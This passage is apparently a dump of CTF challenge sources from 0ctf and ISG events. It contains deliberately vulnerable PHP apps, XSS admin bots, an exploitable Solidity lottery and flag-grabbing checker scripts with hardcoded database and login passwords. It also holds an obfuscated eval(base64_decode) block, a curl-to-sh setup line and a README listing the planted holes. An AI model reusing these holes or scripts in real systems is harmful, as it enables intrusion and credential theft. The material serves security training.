"); 19 | } 20 | else if($_FILES["file"]["size"] > 20000) 21 | { 22 | die("The file is too large."); 23 | } 24 | else 25 | { 26 | $upload_dir = './tmp/'; 27 | $rand = mt_rand(); 28 | $filename = md5($_FILES["file"]["name"]).sha1($rand); 29 | 30 | if (file_exists($upload_dir . $filename)) 31 | { 32 | die("File already exists. "); 33 | } 34 | else 35 | { 36 | file_put_contents($upload_dir . $filename, file_get_contents('tthisiiisttheflllaaag.txt')); 37 | die("Uplad success!"); 38 | } 39 | } 40 | die(); 41 | } 42 | ?> -------------------------------------------------------------------------------- /ISG2014/safesite/admin/conn.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/run.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os, shutil 3 | import time 4 | import json 5 | 6 | data_dir = '/var/www/html/data/' 7 | backup_dir = "/root/backup/" 8 | base_url = 'https://router.vip/data/' 9 | 10 | def getTabs(): 11 | return json.loads(requests.get("http://127.0.0.1:9222/json").text) 12 | 13 | def openTab(fname): 14 | requests.get("http://127.0.0.1:9222/json/new?"+base_url+fname) 15 | 16 | def closeTab(id): 17 | requests.get("http://127.0.0.1:9222/json/close/"+id) 18 | 19 | def closeAll(data): 20 | for i in data: 21 | if i['id'] == 'cd201794-aaf2-44bf-b960-79e369765a7f': 22 | continue 23 | else: 24 | closeTab(i['id']) 25 | 26 | def getHtml(): 27 | l = [] 28 | for rt, dirs, files in os.walk(data_dir): 29 | for f in files: 30 | if f.endswith('.html'): 31 | l.append(f) 32 | return l 33 | 34 | def moveFile(fname): 35 | shutil.move(data_dir+fname, backup_dir) 36 | 37 | def process(fname): 38 | print(fname) 39 | openTab(fname) 40 | time.sleep(3) 41 | closeAll(getTabs()) 42 | moveFile(fname) 43 | 44 | while True: 45 | try: 46 | files = getHtml() 47 | for i in files: 48 | 
process(i) 49 | time.sleep(5) 50 | except Exception as e: 51 | print(e) 52 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/rsa_flag.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests, random, string 3 | import rsa 4 | from zeroweapon import oracle 5 | 6 | import sys 7 | reload(sys) 8 | sys.setdefaultencoding('utf-8') 9 | 10 | service = 'z0ne' 11 | timeout = 3 # define timeout here 12 | author = 'md5_salt' # author 13 | 14 | def genRandomLetters(length): 15 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 16 | 17 | def getTeamID(host): 18 | return int(host[8:10]) 19 | 20 | def exploit(host): 21 | port = 8000 22 | with open('private.pem') as privatefile: 23 | p = privatefile.read() 24 | privkey = rsa.PrivateKey.load_pkcs1(p) 25 | nonce = genRandomLetters(8) 26 | teamid = getTeamID(host) 27 | message = str(teamid)+nonce 28 | signature = rsa.sign(message, privkey, 'SHA-1').encode('hex') 29 | 30 | team_flag = requests.get('http://%s:%s/check_flag?teamid=%s&nonce=%s&signature=%s'%(host, port, teamid, nonce, signature)).text 31 | #real_flag = oracle(service, getTeamID(host)) 32 | print team_flag 33 | return team_flag 34 | ''' 35 | if team_flag == real_flag: 36 | return 'OK' 37 | else: 38 | return 'rsa check flag error' 39 | return team_flag 40 | ''' 41 | 42 | 43 | if __name__ == '__main__': 44 | print exploit('100.64.105.11') -------------------------------------------------------------------------------- /0ctf2016-final/checker/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | 8 | 9 | service = 'z0ne' 10 | timeout = 10 # define timeout here 11 | author = 'md5_salt' # author 12 | 13 | 14 | def genRandomLetters(length): 15 | return 
''.join([random.choice(string.letters) for i in xrange(length)]) 16 | 17 | def getTeamID(host): 18 | return int(host[8:10]) 19 | 20 | def exploit(host, port): 21 | s = requests.Session() 22 | if 'You are logged in' in s.post('http://%s:%d/login'%(host,port), data={'login-username':'root@5alt.me', 'login-password': 'gsajdg765jh'}).text: 23 | return s.get('http://%s:%d/flag'%(host, port)).text 24 | 25 | 26 | if __name__ == '__main__': 27 | print exploit('100.64.100.11', 8000) 28 | print exploit('100.64.101.11', 8000) 29 | print exploit('100.64.102.11', 8000) 30 | print exploit('100.64.103.11', 8000) 31 | print exploit('100.64.104.11', 8000) 32 | print exploit('100.64.105.11', 8000) 33 | print exploit('100.64.106.11', 8000) 34 | print exploit('100.64.107.11', 8000) 35 | print exploit('100.64.108.11', 8000) 36 | print exploit('100.64.109.11', 8000) 37 | print exploit('100.64.110.11', 8000) 38 | print exploit('100.64.111.11', 8000) 39 | print exploit('100.64.112.11', 8000) 40 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/readme.md: -------------------------------------------------------------------------------- 1 | # ZeroLottery 2 | 3 | Hello guys, welcome to the wonderful ethereum casino. We proudly present our first lottery game, ZeroLottery. Give me your lucky number, chances to get huge amount of money back! Every one can read the code, fair and honest. There is only one small step between you and billionaire. Come to win now! 4 | 5 | ## Attention 6 | Every team has a independent private chain. The password for account `0xAC9E27B1fABd55D3E85104d9FEB945C57d99f43A` is `tctf2018` with 10 ETH. The address of ZeroLottery is `0xb3883b88A48923187A22Ee27d4cb840a4Be68fD3`. We expose a json rpc port(`http://192.168.201.18:80`) of the private chain. 7 | 8 | Your goal is make your ZeroLottery's balance > 500. After that, you can get the flag at `http://192.168.201.18:5000/flag?wallet=` page. 
9 | 10 | Read the source code first before have a try! Do not attack the platform! 11 | 12 | Do not make any transactions unless you know what you are doing. Due to mining can be very slow, wait some time(maybe 2 min or more) before making a new transaction. You can not control the miner, so if you think the miner stop working, ask the one who named `md5_salt` for help. DoS can only affect your chain and we would ban your ip. If you run out your ETH, this challenge is over, no refund, just move to other challenges please. 13 | 14 | We suggest you set up a test chain, when you are sure your exploit works, then try it on the challenge . -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/main/index.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | XSS Book 16 | 17 | 18 | 19 | 20 | 21 |

XSS Book


The flag is in http://admin.government.vip:8000


Bruteforce and scanning are not needed!


Admin will be hit by your payload


Try to find a string $str so that (substr(md5($str), 0, 6) === '<6-hex-digit value; not preserved in this listing>').

41 | 42 | 43 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/run.php: -------------------------------------------------------------------------------- 1 | success_validate($_POST['geetest_challenge'], $_POST['geetest_validate'], $_POST['geetest_seccode'], $user_id); 25 | if ($result) { 26 | //good 27 | } else{ 28 | die('capcha error'); 29 | } 30 | }else{ //服务器宕机,走failback模式 31 | if ($GtSdk->fail_validate($_POST['geetest_challenge'],$_POST['geetest_validate'],$_POST['geetest_seccode'])) { 32 | //good 33 | }else{ 34 | die('capcha error'); 35 | } 36 | } 37 | ?> 38 | 39 | 40 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/README.md: -------------------------------------------------------------------------------- 1 | 安装sendmail 2 | 3 | 第一天lua waf 4 | 第二天直接给源码? 5 | 6 | 7 | 提供重启的接口 8 | 9 | 不能删除root@5alt.me这个用户 10 | 11 | 因为不能改源码,所以需要防止别人读到secret之后直接模拟管理员,每次restart都重置 12 | 13 | 14 | nginx lua用户为nobody 15 | 16 | /etc/sudoers 17 | 18 | nginx ALL=(root) NOPASSWD: /usr/local/openresty/nginx/sbin/nginx -c /usr/local/openresty/nginx/conf/nginx.conf,/usr/local/openresty/nginx/sbin/nginx -s reload,/usr/local/openresty/nginx/sbin/nginx -s stop 19 | 20 | 21 | ctf ALL=(root) NOPASSWD: killall -u z0ne 22 | ctf ALL=(z0ne) NOPASSWD: python /home/z0ne/web.py 23 | 24 | 25 | killall web.py 26 | 27 | 控制权限! 28 | 目录不能可改,只能修改pyc文件和.secret文件 29 | 30 | #洞 31 | secret key重启会变 重启不清除pyc,secretkey被偷了自己想办法改 32 | 因为可能注册@5alt.me的用户,提供删除用户接口,密码checker抓 33 | 34 | xss打管理员! 35 | 36 | 1. debug 37 | 2. check flag没检查id,流量转发 38 | 3. 注册@5alt.me的用户 39 | 4. 任意文件下载(下secret,伪造session) 40 | 5. 任意文件上传(上传secret?写pyc?重启解决。写pyc有用么) 41 | 6. reset password: newpwd处有注入 42 | 7. activate处注入 43 | 8. reg处注入 44 | 9. reg处命令执行 45 | 10. 
post处注入 删掉 46 | 47 | #安装ngix 48 | https://openresty.org/en/installation.html 49 | 50 | https://github.com/loveshell/ngx_lua_waf 51 | 52 | /usr/local/openresty/nginx/conf 53 | 54 | 55 | lua_package_path "/usr/local/openresty/nginx/conf/waf/?.lua"; 56 | lua_shared_dict limit 10m; 57 | init_by_lua_file /usr/local/openresty/nginx/conf/waf/init.lua; 58 | access_by_lua_file /usr/local/openresty/nginx/conf/waf/waf.lua; 59 | access_log /dev/null; 60 | #error_log /dev/null; 61 | 62 | 63 | location / { 64 | #root html; 65 | #index index.html index.htm; 66 | proxy_pass http://127.0.0.1:8080; 67 | } -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/verify.php: -------------------------------------------------------------------------------- 1 | alert("success!"); location="index.php";'; 14 | die(); 15 | }else{ 16 | echo ''; 17 | die(); 18 | } 19 | } 20 | 21 | ?> 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | Verify 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 50 | 51 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/zerolottery.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.21; 2 | contract ZeroLottery { 3 | struct SeedComponents { 4 | uint component1; 5 | uint component2; 6 | uint component3; 7 | uint component4; 8 | } 9 | 10 | uint private base = 8; 11 | 12 | address private owner; 13 | mapping (address => uint256) public balanceOf; 14 | 15 | function ZeroLottery() public { 16 | owner = msg.sender; 17 | } 18 | 19 | function init() public payable { 20 | balanceOf[msg.sender] = 100; 21 | } 22 | 23 | function seed(SeedComponents components) internal pure returns (uint) { 24 | uint secretSeed = uint256(keccak256( 25 | components.component1, 26 | components.component2, 27 | components.component3, 28 | components.component4 29 | )); 30 | return secretSeed; 31 | } 32 | 33 | function bet(uint guess) 
public payable { 34 | require(msg.value>1 ether); 35 | require(balanceOf[msg.sender] > 0); 36 | uint secretSeed = seed(SeedComponents((uint)(block.coinbase), block.difficulty, block.gaslimit, block.timestamp)); 37 | uint n = uint(keccak256(uint(msg.sender), secretSeed)) % base; 38 | 39 | if (guess != n) { 40 | balanceOf[msg.sender] = 0; 41 | // charge 0.5 ether for failure 42 | msg.sender.transfer(msg.value - 0.5 ether); 43 | return; 44 | } 45 | // charge 1 ether for success 46 | msg.sender.transfer(msg.value - 1 ether); 47 | balanceOf[msg.sender] = balanceOf[msg.sender] + 100; 48 | } 49 | 50 | function paolu() public payable { 51 | require(msg.sender == owner); 52 | selfdestruct(owner); 53 | } 54 | 55 | } -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/login.php: -------------------------------------------------------------------------------- 1 | alert("fail!"); location="login.php";'; 12 | die(); 13 | } 14 | } 15 | 16 | 17 | ?> 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | Signin 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/run.js: -------------------------------------------------------------------------------- 1 | //while sleep 1; do phantomjs --ignore-ssl-errors=true --local-to-remote-url-access=true --web-security=false --ssl-protocol=any xss-bot.js; done; 2 | var system = require('system'); 3 | var url = ''; 4 | if (system.args.length === 1) { 5 | console.log('Ussage: '+phantom.scriptName+' url'); 6 | } else { 7 | url = system.args[1]; 8 | } 9 | 10 | var page = require('webpage').create(); 11 | var timeout = 3000; 12 | 13 | phantom.addCookie({ 14 | 'name' : 'username', /* required property */ 15 | 'value' : 'admin', /* required property */ 16 | 'domain' : 'admin.government.vip', 17 | 'path' : '/', /* required property */ 18 | 'httponly' : false, 19 | 'secure' : 
false, 20 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 21 | }); 22 | phantom.addCookie({ 23 | 'name' : '2333', /* required property */ 24 | 'value' : '233333', /* required property */ 25 | 'domain' : 'admin.government.vip', 26 | 'path' : '/', /* required property */ 27 | 'httponly' : true, 28 | 'secure' : false, 29 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 30 | }); 31 | 32 | 33 | page.settings.userAgent = "Mozilla/5.0 Chrome for 0ctf2017 by md5_salt"; 34 | page.settings.XSSAuditingEnabled = true 35 | 36 | page.onConsoleMessage = function(msg) { 37 | console.log(msg); 38 | }; 39 | 40 | page.onNavigationRequested = function(url, type, willNavigate, main) { 41 | console.log("[URL] URL="+url); 42 | }; 43 | 44 | page.settings.resourceTimeout = timeout; 45 | page.onResourceTimeout = function(e) { 46 | setTimeout(function(){ 47 | console.log("[INFO] Timeout") 48 | phantom.exit(); 49 | }, 1); 50 | }; 51 | 52 | page.open(url, function(status) { 53 | console.log("[INFO] rendered page"); 54 | setTimeout(function(){ 55 | console.log("[INFO] Timeout") 56 | phantom.exit(); 57 | }, timeout); 58 | }); 59 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/5alt_admin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | from zeroweapon import oracle 8 | 9 | service = 'z0ne' 10 | timeout = 10 # define timeout here 11 | author = 'md5_salt' # author 12 | 13 | 14 | def genRandomLetters(length): 15 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 16 | 17 | def getTeamID(host): 18 | return int(host[8:10]) 19 | 20 | def exploit(host): 21 | port = 8000 22 | #real_flag = oracle(service, getTeamID(host)) 23 | #这里host应该为mysql的host,改unix_socket 24 | conn = 
MySQLdb.connect(host=host,user='root',passwd='v8y1qjq9Xx8mDcwd',db='z0ne',charset="utf8")#, unix_socket='/Applications/MAMP/tmp/mysql/mysql.sock') 25 | conn.autocommit(True) 26 | cursor = conn.cursor() 27 | 28 | try: 29 | email = genRandomLetters(8)+'@5alt.me' 30 | password = genRandomLetters(8) 31 | #requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).textprint requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text 32 | if not 'User added' in requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text: 33 | raise Exception("Reg user error") 34 | 35 | sql = "SELECT * FROM users WHERE email = %s" 36 | cursor.execute(sql, [email]) 37 | result = cursor.fetchone() 38 | 39 | secret = result[4] 40 | s = requests.Session() 41 | if not 'activate successfully' in s.post('http://%s:%d/activate'%(host, port), data={'user-email': email, 'secret': secret}).text: 42 | raise Exception("Active user error") 43 | 44 | print s.get('http://%s:%d/flag'%(host, port)).text 45 | 46 | message = 'OK' 47 | except Exception as e: 48 | message = str(e) 49 | 50 | sql = "DELETE FROM users WHERE email = %s" 51 | cursor.execute(sql, [email]) 52 | 53 | return message 54 | 55 | if __name__ == '__main__': 56 | print exploit('100.64.105.11') 57 | 58 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/readme.txt: -------------------------------------------------------------------------------- 1 | vnc上去 2 | google-chrome --incognito --remote-debugging-port=9222 3 | 4 | 8 | 18 | 19 | 20 | cat .htaccess 21 | RewriteEngine on 22 | RewriteRule "^.*b.*" "/a.php" 23 | 24 | 25 | 26 | root@zerobox:/etc/apache2/sites-enabled# cat ssl.conf 27 | 28 | 29 | ServerName www.forestime.net 30 | DocumentRoot /var/www/html1 31 | 32 | AllowOverride All 33 | 34 | 35 | ErrorLog 
${APACHE_LOG_DIR}/error.log 36 | CustomLog ${APACHE_LOG_DIR}/access.log combined 37 | 38 | 39 | # SSL Engine Switch: 40 | # Enable/Disable SSL for this virtual host. 41 | SSLEngine on 42 | 43 | SSLCertificateFile /etc/apache2/f.crt 44 | SSLCertificateKeyFile /etc/apache2/f.key 45 | SSLCertificateChainFile /etc/apache2/fc.crt 46 | 47 | 48 | 49 | ServerName router.vip 50 | DocumentRoot /var/www/html 51 | 52 | ErrorLog ${APACHE_LOG_DIR}/error.log 53 | CustomLog ${APACHE_LOG_DIR}/access.log combined 54 | 55 | 56 | # SSL Engine Switch: 57 | # Enable/Disable SSL for this virtual host. 58 | SSLEngine on 59 | 60 | SSLCertificateFile /etc/apache2/router.vip.crt 61 | SSLCertificateKeyFile /etc/apache2/router.vip.key 62 | SSLCertificateChainFile /etc/apache2/root.crt 63 | 64 | 65 | 66 | 67 | # ServerName 202.120.7.204 68 | DocumentRoot /var/www/html1 69 | 70 | ErrorLog ${APACHE_LOG_DIR}/error.log 71 | CustomLog ${APACHE_LOG_DIR}/access.log combined 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /0ctf2016-final/checker/reset_pwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | 8 | service = 'z0ne' 9 | timeout = 10 # define timeout here 10 | author = 'md5_salt' # author 11 | 12 | 13 | def genRandomLetters(length): 14 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 15 | 16 | def getTeamID(host): 17 | return int(host[8:10]) 18 | 19 | def exploit(host): 20 | port = 8000 21 | #这里host应该为mysql的host,改unix_socket 22 | conn = MySQLdb.connect(host=host,user='root',passwd='v8y1qjq9Xx8mDcwd',db='z0ne',charset="utf8")#, unix_socket='/Applications/MAMP/tmp/mysql/mysql.sock') 23 | conn.autocommit(True) 24 | cursor = conn.cursor() 25 | 26 | try: 27 | email = genRandomLetters(8)+'@2333.me' 28 | password = genRandomLetters(8) 29 | if not 'User added' in 
requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text: 30 | raise Exception("Reg user error") 31 | 32 | sql = "SELECT * FROM users WHERE email = %s" 33 | cursor.execute(sql, [email]) 34 | result = cursor.fetchone() 35 | 36 | secret = result[4] 37 | s = requests.Session() 38 | data = s.post('http://%s:%d/activate'%(host, port), data={'user-email': email, 'secret': secret}).text 39 | if not 'activate successfully' in data: 40 | print data 41 | raise Exception("Active user error") 42 | 43 | new_password = genRandomLetters(8) 44 | s.post('http://%s:%d/reset_password'%(host, port), data={'user-old-password':password, 'user-new-password':new_password}).text 45 | 46 | if not 'You are logged in' in requests.post('http://%s:%d/login'%(host,port), data={'login-username':email, 'login-password': new_password}).text: 47 | raise Exception("Login error") 48 | 49 | message = 'OK' 50 | except Exception as e: 51 | message = str(e) 52 | 53 | sql = "DELETE FROM users WHERE email = %s" 54 | cursor.execute(sql, [email]) 55 | 56 | return message 57 | 58 | if __name__ == '__main__': 59 | print exploit('100.64.105.11') 60 | 61 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/main/static/i_dont_believe_you_can_guess_this_js.js.php: -------------------------------------------------------------------------------- 1 | // 2 | //while sleep 1; do phantomjs --ignore-ssl-errors=true --local-to-remote-url-access=true --web-security=false --ssl-protocol=any xss-bot.js; done; 3 | var system = require('system'); 4 | var url = ''; 5 | if (system.args.length === 1) { 6 | console.log('Ussage: '+phantom.scriptName+' url'); 7 | } else { 8 | url = system.args[1]; 9 | } 10 | 11 | var page = require('webpage').create(); 12 | var timeout = 3000; 13 | 14 | phantom.addCookie({ 15 | 'name' : 'username', /* required property */ 16 | 'value' : 'admin', /* required property */ 17 | 
'domain' : 'admin.government.vip', 18 | 'path' : '/', /* required property */ 19 | 'httponly' : false, 20 | 'secure' : false, 21 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 22 | }); 23 | phantom.addCookie({ 24 | 'name' : 'admin_secret', /* required property */ 25 | 'value' : 'md5_salt_is_the_real_admin', /* required property */ 26 | 'domain' : 'admin.government.vip', 27 | 'path' : '/', /* required property */ 28 | 'httponly' : true, 29 | 'secure' : false, 30 | 'expires' : (new Date()).getTime() + (1000 * 60 * 60) /* <-- expires in 1 hour */ 31 | }); 32 | 33 | 34 | page.settings.userAgent = "Mozilla/5.0 Chrome for 0ctf2017 by md5_salt"; 35 | page.settings.XSSAuditingEnabled = true 36 | 37 | page.onConsoleMessage = function(msg) { 38 | console.log(msg); 39 | }; 40 | 41 | page.onNavigationRequested = function(url, type, willNavigate, main) { 42 | console.log("[URL] URL="+url); 43 | }; 44 | 45 | page.settings.resourceTimeout = timeout; 46 | page.onResourceTimeout = function(e) { 47 | setTimeout(function(){ 48 | console.log("[INFO] Timeout") 49 | phantom.exit(); 50 | }, 1); 51 | }; 52 | 53 | page.open(url, function(status) { 54 | console.log("[INFO] rendered page"); 55 | setTimeout(function(){ 56 | console.log("[INFO] Timeout") 57 | phantom.exit(); 58 | }, timeout); 59 | }); 60 | -------------------------------------------------------------------------------- /ISG2014/safesite/main/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Safe Site 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 33 | 34 |

Safe Site


This is a really safe site. No SQLi, no XSS, no CSRF...


No one can hack it directly, unless you have a dir overflow 0day ;)


You can you up, no can no BB =, =


Beat the admin!


Come on!

54 | 55 | 56 | -------------------------------------------------------------------------------- /ISG2014/X-Area/index.php: -------------------------------------------------------------------------------- 1 | "zasada"); 10 | $valid_users = array_keys($valid_passwords); 11 | 12 | $user = @$_SERVER['PHP_AUTH_USER']; 13 | $pass = @$_SERVER['PHP_AUTH_PW']; 14 | 15 | $validated = (in_array($user, $valid_users)) && ($pass == $valid_passwords[$user]); 16 | 17 | if (!$validated) { 18 | header('WWW-Authenticate: Basic realm="X-Area"'); 19 | header('HTTP/1.0 401 Unauthorized'); 20 | die ("I don't think you are 'hack.the.life@gmail.com'. Get out!"); 21 | } 22 | 23 | eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKCmZ1bmN0aW9uIGRlY3J5cHQoJGVuY3J5cHRlZCwgJGtleSkKewoJJGtleT1tZDUoJGtleSk7CiAgICAkY2lwaGVydGV4dF9kZWMgPSBwYWNrKCJIKiIsJGVuY3J5cHRlZCk7CiAgICAkbW9kdWxlID0gbWNyeXB0X21vZHVsZV9vcGVuKE1DUllQVF9SSUpOREFFTF8xMjgsICcnLCBNQ1JZUFRfTU9ERV9DQkMsICcnKTsKICAgICRpdiA9IHN1YnN0cihtZDUoJGtleSksMCxtY3J5cHRfZW5jX2dldF9pdl9zaXplKCRtb2R1bGUpKTsKICAgIG1jcnlwdF9nZW5lcmljX2luaXQoJG1vZHVsZSwgJGtleSwgJGl2KTsKICAgICRkZWNyeXB0ZWQgPSBtZGVjcnlwdF9nZW5lcmljKCRtb2R1bGUsICRjaXBoZXJ0ZXh0X2RlYyk7CiAgICBtY3J5cHRfZ2VuZXJpY19kZWluaXQoJG1vZHVsZSk7CiAgICBtY3J5cHRfbW9kdWxlX2Nsb3NlKCRtb2R1bGUpOwogICAgcmV0dXJuIHJ0cmltKCRkZWNyeXB0ZWQsIlwwIik7Cn0KCmlmKEAkX1JFUVVFU1RbJ2tleSddKXsKCSRrZXk9JF9SRVFVRVNUWydrZXknXTsKCWVjaG8gZXZhbCh+J5qcl5Dfmomek9ebmpyNho+L193OyJ2bzZyanp2am8zKns7Pz5mZnJuZyp2bm8bPzpmems7OxsrHypzJncrLyc7Nm8bHz8vMy8jKns6ZxpqdnJvGxsvPx86ZnJ7NnczLx57JzsvMz8jLycrKyprInM2dyMjKzJnPzcadysedz87IxpydzZvOzsidnc/Kmc7My5zNm57NmcnPxp3OzMzMys7OmZzIyMidmZ3PxpzNnMycx8uczZqdxpmcms/Mzp3Gxs7LyczJxpucmc2emsfNy8nJx8mby5qezJmbzcbOycidyciczMzPzMqdncuezcjKmsaanJ3IzsaczMidyc+Zyp2azZnNzZzJxpyazcvGyciam5zOncrGyJ7NxsedmZnGz8qbmZqamsbInsyezciZnpnIxp3Myp7HzMrHx8jPz5mdz8/Kz8vOnJqans3HyJuamcvHnsiemZmdx8zOx52dm8bHmsadnZ2ezcbJm52Zm57Gm8/O3dPf25SahtbWxCcpOwp9ZWxzZXsKCWVjaG8gIkFjY2VzcyBERU5JRUQhIjsKfQ==')); 24 | echo ' 

Change Phone


Please use your ip instead of phone
We will send a http request to 80 port with verify code!


Try to find a string $str so that (substr(md5($str), 0, 6) === '<6-hex-digit value; not preserved in this listing>').

62 | 63 | 64 | -------------------------------------------------------------------------------- /0ctf2018-final/zerolottery/base_chain/flag.py: -------------------------------------------------------------------------------- 1 | #coding=utf8 2 | from web3 import Web3, HTTPProvider 3 | import json, re 4 | 5 | from flask import Flask,request 6 | 7 | def get_balance(team, wallet): 8 | port = 8000+team 9 | 10 | contract_addr = '0xb3883b88A48923187A22Ee27d4cb840a4Be68fD3' 11 | token_t_abi = '[ { "constant": true, "inputs": [ { "name": "", "type": "address" } ], "name": "balanceOf", "outputs": [ { "name": "", "type": "uint256", "value": "0" } ], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [ { "name": "guess", "type": "uint256" } ], "name": "bet", "outputs": [], "payable": true, "stateMutability": "payable", "type": "function" }, { "constant": false, "inputs": [], "name": "init", "outputs": [], "payable": true, "stateMutability": "payable", "type": "function" }, { "inputs": [], "payable": false, "stateMutability": "nonpayable", "type": "constructor" } ]' 12 | #wallet_w = wallet#'0xAC9E27B1fABd55D3E85104d9FEB945C57d99f43A' 13 | wallet_w = Web3.toChecksumAddress(wallet.lower())#'0xAC9E27B1fABd55D3E85104d9FEB945C57d99f43A' 14 | 15 | w3 = Web3(HTTPProvider('http://127.0.0.1:%d' % port)) 16 | token = w3.eth.contract( 17 | contract_addr, 18 | abi=json.loads(token_t_abi), 19 | ) 20 | return token.call().balanceOf(wallet_w) 21 | 22 | def ip2team(ip): 23 | ''' 24 | 192.168.100.1 25 | 192.168.101.1 26 | ''' 27 | #return 0 28 | return int(ip.split('.')[2]) - 100 29 | 30 | 31 | app = Flask(__name__) 32 | 33 | @app.route('/') 34 | def index(): 35 | return 'Welcome to ZeroLottery.' 
36 | 37 | 38 | @app.route('/flag') 39 | def flag(): 40 | wallet = request.args.get('wallet', '') 41 | if not wallet or not re.match(r'0x[0-9a-fA-F]{32,}', wallet): 42 | return 'bad address format' 43 | 44 | ip = request.remote_addr 45 | team = ip2team(ip) 46 | balance = get_balance(team, wallet) 47 | if balance > 500: 48 | return 'flag{smart_contracts_is_not_so_secure}' 49 | 50 | return 'Your balance is ' + str(balance) 51 | 52 | if __name__ == '__main__': 53 | from tornado.wsgi import WSGIContainer 54 | from tornado.httpserver import HTTPServer 55 | from tornado.ioloop import IOLoop 56 | 57 | http_server = HTTPServer(WSGIContainer(app)) 58 | http_server.listen(5000) 59 | IOLoop.instance().start() 60 | #app.run(debug=True) -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/register.php: -------------------------------------------------------------------------------- 1 | alert("success!"); location="login.php";'; 18 | }else{ 19 | echo ''; 20 | } 21 | die(); 22 | } 23 | ?> 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | Register 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 57 | 58 | -------------------------------------------------------------------------------- /0ctf2016-final/z0ne.sh: -------------------------------------------------------------------------------- 1 | #sh -c "$(curl -fsSL http://100.64.80.11/z0ne.sh)" 2 | 3 | apt-get -qq -y update 4 | 5 | DEBIAN_FRONTEND=noninteractive apt-get -y install mailutils 6 | DEBIAN_FRONTEND=noninteractive apt-get -q -y install mysql-server 7 | mysqladmin -u root password v8y1qjq9Xx8mDcwd 8 | mysql -uroot -pv8y1qjq9Xx8mDcwd -N -B -e "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'v8y1qjq9Xx8mDcwd';" 9 | sed -i "s/127.0.0.1/*/g" /etc/mysql/my.cnf 10 | service mysql restart 11 | 12 | apt-get -y install python-pip 13 | apt-get -y install python-dev libmysqlclient-dev 14 | pip install MySQL-python 15 | pip install rsa 16 | pip install flask 17 | pip install 
werkzeug==0.10 18 | pip install tornado 19 | 20 | apt-get -y install libreadline-dev libncurses5-dev libpcre3-dev libssl-dev perl make build-essential 21 | 22 | wget https://openresty.org/download/openresty-1.9.7.4.tar.gz 23 | tar xzvf openresty-1.9.7.4.tar.gz 24 | cd /root/openresty-1.9.7.4/ && ./configure 25 | cd /root/openresty-1.9.7.4/ && make 26 | cd /root/openresty-1.9.7.4/ && make install 27 | cd ~ 28 | 29 | /usr/local/openresty/nginx/sbin/nginx 30 | /usr/local/openresty/nginx/sbin/nginx -s stop 31 | 32 | useradd ctf -d /home/ctf -s /bin/bash 33 | useradd z0ne -d /home/z0ne -s /usr/sbin/nologin 34 | 35 | mkdir /home/ctf 36 | chown root:ctf /home/ctf 37 | chmod 770 /home/ctf 38 | 39 | mkdir /home/z0ne 40 | chown root:z0ne /home/z0ne 41 | chmod 770 /home/z0ne 42 | 43 | mkdir /home/ctf/waf/ 44 | chmod 770 /home/ctf/waf/ 45 | chown ctf:ctf /home/ctf/waf/ 46 | touch /home/ctf/waf/init.lua 47 | touch /home/ctf/waf/waf.lua 48 | chown ctf:ctf /home/ctf/waf/init.lua 49 | chown ctf:ctf /home/ctf/waf/waf.lua 50 | chmod 770 /home/ctf/waf/init.lua 51 | chmod 770 /home/ctf/waf/waf.lua 52 | 53 | apt-get install unzip 54 | #wget http://100.64.80.11/z0ne.zip 55 | 56 | unzip z0ne.zip 57 | mv readme.txt /home/ctf/readme.txt 58 | 59 | 